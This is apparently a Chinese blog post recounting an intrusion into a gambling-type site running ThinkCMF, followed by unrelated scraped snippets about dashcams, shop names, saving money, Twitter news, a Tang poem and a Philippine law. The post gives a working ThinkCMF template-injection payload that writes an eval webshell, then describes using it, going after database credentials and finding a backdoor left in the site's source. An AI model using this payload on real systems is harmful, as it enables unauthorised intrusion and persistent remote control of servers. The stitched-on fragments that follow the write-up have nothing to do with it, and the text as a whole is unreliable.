记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程
拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。
进去之后在url处构造报错
查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" *** *** 521"]);?>')</php>
写入shell之后连接蚁剑,直接拿下
鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!
一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。
正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。
这。。。这TM。。。有人在代码里下毒。
拿着不知道是哪位好心人留下的后门,含泪登录了后台。
帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。
汽车检测仪里的Scan文件可以删除吗? 1、在行车记录仪上找到文件管理功能,在文件管理里删除掉不需要的行车记录即可。如果安装的行车记录仪没有这个功能,就只能取出储存卡,用读卡器删除掉部分行车记录。2、...
顺口两个字给水饺店铺取名一个字给水饺店铺名字大全 铜钱给水饺官方店铺 戽、陨、锭 对折给水饺直销店铺 准、邮、外 泥沼给水饺旗舰店铺 春、燕、呼 口才给水饺特价店铺 ...
赚钱不努力,努力不赚钱!你会发现一个现象,自己很辛苦也很努力地去工作,甚至连假节日都不敢休息,平时也很节俭,也没买什么奢侈品,每个月也都有存钱。但是就是不知道为什么,钱存得很慢,一年到头来存钱的速度还...
【猎云网(微信号:)】12月18日报道(编译:福尔摩望) 据悉,Twitter被爆存在一个安全漏洞,不法分子可以通过该漏洞提取帐号电话号码的国家代码,并查看该帐号是否被Twitter锁定。这一消...
“南湖秋水夜无烟, 耐可乘流直上天。 且就洞庭赊月色, 将船买酒白云边。 唐朝李白《陪族叔刑部侍郎晔及中书贾舍人至游洞庭五首》节录 初衣解诗:本地中秋,今日午间高温高达38度。这是...
中新网马尼拉1月5日电 (记者 关向东)当地时间1月5日,菲律宾总统发言人哈里·洛克在新闻发布会上宣布,菲律宾总统杜特尔特在2020年12月23日签署了第11509号共和国法案《医学生奖学金法案》...